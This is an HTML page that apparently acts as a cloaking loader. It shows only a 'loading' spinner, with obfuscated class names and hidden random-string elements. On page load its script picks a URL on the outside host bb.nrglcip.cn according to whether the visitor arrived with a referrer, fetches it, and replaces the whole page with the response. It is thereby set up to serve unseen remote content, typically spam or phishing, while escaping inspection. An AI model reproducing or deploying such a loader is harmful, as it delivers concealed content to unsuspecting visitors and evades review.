<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .h0a4Qx {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .h0a4Qx .KoeEKSq {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .h0a4Qx .content {
            line-height: 50px;
            text-align: center
        }

        .h0a4Qx .img {
            width: 100%
        }

        .h0a4Qx .sDSXrMEfd2e {
            text-align: center
        }

        .h0a4Qx .sDSXrMEfd2e span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .h0a4Qx .sDSXrMEfd2e span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .h0a4Qx .sDSXrMEfd2e span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .h0a4Qx .sDSXrMEfd2e span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .h0a4Qx .sDSXrMEfd2e span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .h0a4Qx .sDSXrMEfd2e span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .h0a4Qx .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XpC6yDzjOX(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var bIqN6h = XpC6yDzjOX('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ bIqN6h +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ bIqN6h +".html?a=share";
		}
		
        iYJoNxUZ=url+"#"+new Date().getTime();
        iYJoNxUZ && function() {
            $.get(iYJoNxUZ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<div style='display:none'>kUOmLNDlnUp51mNNtpWh8yXw9DK2Md8zN7x0jNI4IcWZ2LHIr</div>
<div style='display:none'>kUOmLNDlnUp51mNNtpWh8yXw9DK2Md8zN7x0jNI4IcWZ2LHIr</div>
<div style='display:none'>kUOmLNDlnUp51mNNtpWh8yXw9DK2Md8zN7x0jNI4IcWZ2LHIr</div>
<p  style='display:none'>XeUOsLAkozYYNliyWeqB5BTmyXWJWeCLkj2SXPBvjF8uFJhltnhjkf6UywRfxasAPl7tzgfLpXtkQlYXd7tvGRI</p>
<p  style='display:none'>XeUOsLAkozYYNliyWeqB5BTmyXWJWeCLkj2SXPBvjF8uFJhltnhjkf6UywRfxasAPl7tzgfLpXtkQlYXd7tvGRI</p>
<p  style='display:none'>XeUOsLAkozYYNliyWeqB5BTmyXWJWeCLkj2SXPBvjF8uFJhltnhjkf6UywRfxasAPl7tzgfLpXtkQlYXd7tvGRI</p>
<span style='display:none'>BbzZXX7dQsf8Z9AjHBu12CIkuqKOhGE4nZ178ih9FPnFzoDI4ifTi39pijs0nXrMVsB12Gtd4m3u4</span><div class="h0a4Qx">
    <div class="KoeEKSq">
        <div class="sDSXrMEfd2e">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >CDiuDsx9yVTAETUGcXAggFr07HQNLrR6mVWn3Nj20KVMZuDnHOWwSkEWkC2beJnm7WgzOIfKLTfAklUmNhbpfO0tfJ3NX3XDgZz5T</li>
<div style='display:none'>yYzpAQgNqntFAJy6rAaNdRjcn3TPUD</div>
<h1 style='display:none' >PcOy5E6mk2DEqPwmnngVL0Pz4dJ4sn9qzk3sZ5RwsTwrh2Qm79YFy9Q0FmXFpr3I6PNVQcw33vbS5rY7</h1>
<li style='display:none' >CDiuDsx9yVTAETUGcXAggFr07HQNLrR6mVWn3Nj20KVMZuDnHOWwSkEWkC2beJnm7WgzOIfKLTfAklUmNhbpfO0tfJ3NX3XDgZz5T</li>
<li style='display:none' >CDiuDsx9yVTAETUGcXAggFr07HQNLrR6mVWn3Nj20KVMZuDnHOWwSkEWkC2beJnm7WgzOIfKLTfAklUmNhbpfO0tfJ3NX3XDgZz5T</li>
<div style='display:none'>yYzpAQgNqntFAJy6rAaNdRjcn3TPUD</div>
<h1 style='display:none' >PcOy5E6mk2DEqPwmnngVL0Pz4dJ4sn9qzk3sZ5RwsTwrh2Qm79YFy9Q0FmXFpr3I6PNVQcw33vbS5rY7</h1>
<p  style='display:none'>sWQR8RZTCtk4AfDg5Vezs0ttEtaI733</p></body>
</html>